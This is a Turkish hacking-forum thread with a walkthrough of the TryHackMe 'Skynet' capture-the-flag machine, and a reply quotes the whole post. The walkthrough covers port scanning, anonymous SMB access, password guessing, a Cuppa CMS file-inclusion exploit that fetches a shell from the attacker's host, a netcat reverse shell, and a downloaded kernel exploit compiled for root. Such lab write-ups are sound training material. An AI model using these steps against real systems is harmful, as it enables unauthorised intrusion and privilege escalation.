TryHackMe | Skynet

Nonantiy

Moderasyon Ekibi Lider Yardımcısı
28 Haz 2020
1,980
1,078
Kayseri
8BfzfS111434df5fdd155e.md.png

İyi günler Türk Hack Team ailesi.
Bugün Skynet adlı zaafiyetli makinayı çözüceğiz.

58601c2a00ccd21300e32bbb16225807.jpg

İlk başta vpn'imi çalıştırıp makinemi başlatıyorum. Sayfayı görüntülediğimde bir arama moturu gibi bir web sayfası görüyorum.

unknown.png

İlk başta nmap ile portları taratıyorum.
Bash:
nmap -v 10.10.187.192
unknown.png

Birden fazla port'un açık olduğunu görüyorum. 22, 80, 100, 139, 143 ve 444 portları suanda açık. Simdi gobuster ile gizli dizinleri bulmak için bir arama yapıyorum.
unknown.png

Birden fazla gizli dizin buldu. İlk'inden tek tek incelemeye başlıyorum. İlk dizini incelediğimde bir mail login sayfası olduğunu gördüm.
unknown.png

Simdi biraz'da smbmp adlı tool'u kullanalım. Ve gördüğüm şey anonymous adlı bir kulllınıcın sahip olduğu yetki. Bu kullanıcı'yı kullanıp smbclient üzerinden sunucuya bağlanıyorum.
unknown.png

Burada'ki logs dosyasını açıyorum.



unknown.png

Buradan indirdiğim dosyalar arasında olan log1.txt dosyasının içerisinde bir wordlist olduğunu gördüm. Simdi bundan önceki attention.txt dosyasının içine baktığımda Miles Dyson ismin birini gördüm. Eposta'ya giriş şayfası için bir kullanıcı adı ve test etmeniz için wordlist bulduk. Bu ismin arasındaki boşluğu silip şifreleri denediğimizde doğru şifreyi bulluyoruz "cyborg007haloterminator" evet bu arad hepsini tek tek denedim.
unknown.png

Buradaki önüme çıkan ilk e-postayı inceledim ve yeni şifreyi gördüm.
unknown.png

Simdi ise smbclient ile milesdyson kullanıcısı ile bağlanalım. Bağlandım ve notes adlı klasör'ün içerişine girdim. Oradan ise important adlı bir dosya ilgimi çekti ve onu get ile bilgisayarıma indirdim.
unknown.png


unknown.png

Ve burada gizli bir dizin olduğunu gördüm. Ve bir soru daha cevap'a kavuştu. Simdi ise bu dizin'e gidelim
unknown.png

Burası Miles'in kişisel blog'u sanırsam. dirsearch adlı bir tool ile bu dizin'in içerisinde bulunan başka bir dizin olup olmadığını kontrol ediyorum.

unknown.png

Burada administrator diye bir sayfa buldum hemen burayı görüntülüyorum.
unknown.png

Maaleseft elimde ne kullanıcı adı var nede bir şifre. Büyüzden Cuppa cms'de bulunan exploit'leri kullanmayaa çalışıcağım. Searchsploit ile bir adet buldum. Bunu kullanabillirim.
unknown.png

http://10.10.187.192/45kra24zxs28v3...../../../../../../../home/milesdyson/user.txt
İlk başta buradan user.txt'i alabillirsiniz.

Bundan sonra yapacağımız işlemer sunlar. İlk önce shell'imizi indiriyoruz. Ardından
Bash:
sudo python3 -m http.server 80
Bu kod sayesinde shell dosyasına uzaktan erişime açtım
Kod:
netcat -lnvp <port>
Eğer shell'imizin ayarlarıyla oynamadıysanız port'u 1234'tür ve o portu dinlemeye alıyoruz.
Bash:
sudo python3 -m http.server 80
Ardından makinemizin ip addresinin yanına
45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.8.221.255:80/shell.php
bunu yapıştırıp shell dosyasını indiriyoruz. İşlem tamamdır. Ve suanda içeriye erişim sağlıyabilliyoruz.

unknown.png
Bash:
python -c 'import pty; pty.spawn("/bin/bash")'
Bu komu'tu yazdık ve suanda normal kullancığımız terminal komutlarını kullanabillir hale geldik.

unknown.png

Simdi root.txt dosyasına erişmek için kendimizi yetkilendirmeliyiz. Bununn için bir exploit buldum. Bunu aynı shell'i sunucunun içerisine soktuğum gibi soktum. Ardından bu exploit'i indirmek için aşadaki komutları girdim.
Kod:
cd /tmp
wget http://10.8.221.255/kernel.c
chmod +x kernel.c
gcc 43418.c -o rootyolu
./rootyolu

cat /root/root.txt
unknown.png

 

Phoenix.py

Katılımcı Üye
9 Tem 2021
567
291
THT
8BfzfS111434df5fdd155e.md.png

İyi günler Türk Hack Team ailesi.
Bugün Skynet adlı zaafiyetli makinayı çözüceğiz.

58601c2a00ccd21300e32bbb16225807.jpg

İlk başta vpn'imi çalıştırıp makinemi başlatıyorum. Sayfayı görüntülediğimde bir arama moturu gibi bir web sayfası görüyorum.

unknown.png

İlk başta nmap ile portları taratıyorum.
Bash:
nmap -v 10.10.187.192
unknown.png

Birden fazla port'un açık olduğunu görüyorum. 22, 80, 100, 139, 143 ve 444 portları suanda açık. Simdi gobuster ile gizli dizinleri bulmak için bir arama yapıyorum.
unknown.png

Birden fazla gizli dizin buldu. İlk'inden tek tek incelemeye başlıyorum. İlk dizini incelediğimde bir mail login sayfası olduğunu gördüm.
unknown.png

Simdi biraz'da smbmp adlı tool'u kullanalım. Ve gördüğüm şey anonymous adlı bir kulllınıcın sahip olduğu yetki. Bu kullanıcı'yı kullanıp smbclient üzerinden sunucuya bağlanıyorum.
unknown.png

Burada'ki logs dosyasını açıyorum.



unknown.png

Buradan indirdiğim dosyalar arasında olan log1.txt dosyasının içerisinde bir wordlist olduğunu gördüm. Simdi bundan önceki attention.txt dosyasının içine baktığımda Miles Dyson ismin birini gördüm. Eposta'ya giriş şayfası için bir kullanıcı adı ve test etmeniz için wordlist bulduk. Bu ismin arasındaki boşluğu silip şifreleri denediğimizde doğru şifreyi bulluyoruz "cyborg007haloterminator" evet bu arad hepsini tek tek denedim.
unknown.png

Buradaki önüme çıkan ilk e-postayı inceledim ve yeni şifreyi gördüm.
unknown.png

Simdi ise smbclient ile milesdyson kullanıcısı ile bağlanalım. Bağlandım ve notes adlı klasör'ün içerişine girdim. Oradan ise important adlı bir dosya ilgimi çekti ve onu get ile bilgisayarıma indirdim.
unknown.png


unknown.png

Ve burada gizli bir dizin olduğunu gördüm. Ve bir soru daha cevap'a kavuştu. Simdi ise bu dizin'e gidelim
unknown.png

Burası Miles'in kişisel blog'u sanırsam. dirsearch adlı bir tool ile bu dizin'in içerisinde bulunan başka bir dizin olup olmadığını kontrol ediyorum.

unknown.png

Burada administrator diye bir sayfa buldum hemen burayı görüntülüyorum.
unknown.png

Maaleseft elimde ne kullanıcı adı var nede bir şifre. Büyüzden Cuppa cms'de bulunan exploit'leri kullanmayaa çalışıcağım. Searchsploit ile bir adet buldum. Bunu kullanabillirim.
unknown.png

http://10.10.187.192/45kra24zxs28v3...../../../../../../../home/milesdyson/user.txt
İlk başta buradan user.txt'i alabillirsiniz.

Bundan sonra yapacağımız işlemer sunlar. İlk önce shell'imizi indiriyoruz. Ardından
Bash:
sudo python3 -m http.server 80
Bu kod sayesinde shell dosyasına uzaktan erişime açtım
Kod:
netcat -lnvp <port>
Eğer shell'imizin ayarlarıyla oynamadıysanız port'u 1234'tür ve o portu dinlemeye alıyoruz.
Bash:
sudo python3 -m http.server 80
Ardından makinemizin ip addresinin yanına
45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.8.221.255:80/shell.php
bunu yapıştırıp shell dosyasını indiriyoruz. İşlem tamamdır. Ve suanda içeriye erişim sağlıyabilliyoruz.

unknown.png
Bash:
python -c 'import pty; pty.spawn("/bin/bash")'
Bu komu'tu yazdık ve suanda normal kullancığımız terminal komutlarını kullanabillir hale geldik.

unknown.png

Simdi root.txt dosyasına erişmek için kendimizi yetkilendirmeliyiz. Bununn için bir exploit buldum. Bunu aynı shell'i sunucunun içerisine soktuğum gibi soktum. Ardından bu exploit'i indirmek için aşadaki komutları girdim.
Kod:
cd /tmp
wget http://10.8.221.255/kernel.c
chmod +x kernel.c
gcc 43418.c -o rootyolu
./rootyolu

cat /root/root.txt
unknown.png

Elinize sağlık hocam :)
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.